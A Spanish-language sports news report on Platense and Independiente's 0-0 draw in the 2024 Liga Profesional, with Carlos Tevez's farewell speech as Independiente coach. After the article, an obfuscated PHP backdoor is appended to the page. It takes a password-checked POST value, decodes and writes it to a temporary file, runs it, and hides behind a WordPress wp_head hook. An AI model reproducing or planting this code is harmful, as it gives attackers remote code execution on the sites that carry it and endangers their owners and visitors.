Platense estuvo más cerca que Independiente, pero no salieron del 0 a 0 en la despedida de Carlos Tevez

Platense e Independiente empataron 0-0, en el estadio Ciudad de Vicente López, por la segunda fecha del Torneo 2024 de la Liga Profesional. Este partido marcó la despedida de Carlos Tevez como técnico de Independiente; el ex entrenador había anticipado hace un par de días atrás su decisión de dejar el cargo.

El Calamar se mostró más predispuesto a quedarse con los tres puntos y mostró un juego más elaborado que un flojo Independiente, que careció de ideas y claridad. La chance más propicia aconteció en el segundo tiempo: un frentazo de Ronaldo Martínez fue tapado por Rodrigo Rey, el rebote lo tomó Gabriel Hachen y su remate fue rechazado por Rey y casi sobre la línea por Juan Federco.

Finalizado el partido, habló Tevez: “Primero y principal, quiero agradecer a la dirigencia, al club Independiente por haber confiado en mí. Para mí es un día triste porque dejo a los muchachos, y creo que es algo que me duele. También quiero agradecer el apoyo incondicional de los jugadores, de toda la gente que trabaja en Independiente, de los utileros, no me quiero olvidar de ninguno, porque la verdad que no era fácil para lo que me trajeron”.

Me trajeron para salvar a Independiente en un momento muy difícil. Lo hicimos en ese campeonato que estuvimos a un gol de clasificar. Quisimos llevar al club a otro paso y no pudimos. Pero me voy conforme con mi trabajo, lo hicimos muy bien. Le agradezco a Hugo Tocalli, por el trabajo que hicimos con los juveniles y por la confianza. Independiente tiene cuatro o cinco en Primera que les falta poco para continuar su carrera. Por último, agradecer al hincha por el respeto. Ellos saben que el momento no era fácil ni para ellos ni para mí, pero juntos salimos de esa situación muy difícil. Me sentí muy bien y muy cómodo. Gracias a todos y buenas tardes”.

Y con este saludo se retiró de la conferencia sin aceptar preguntas.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}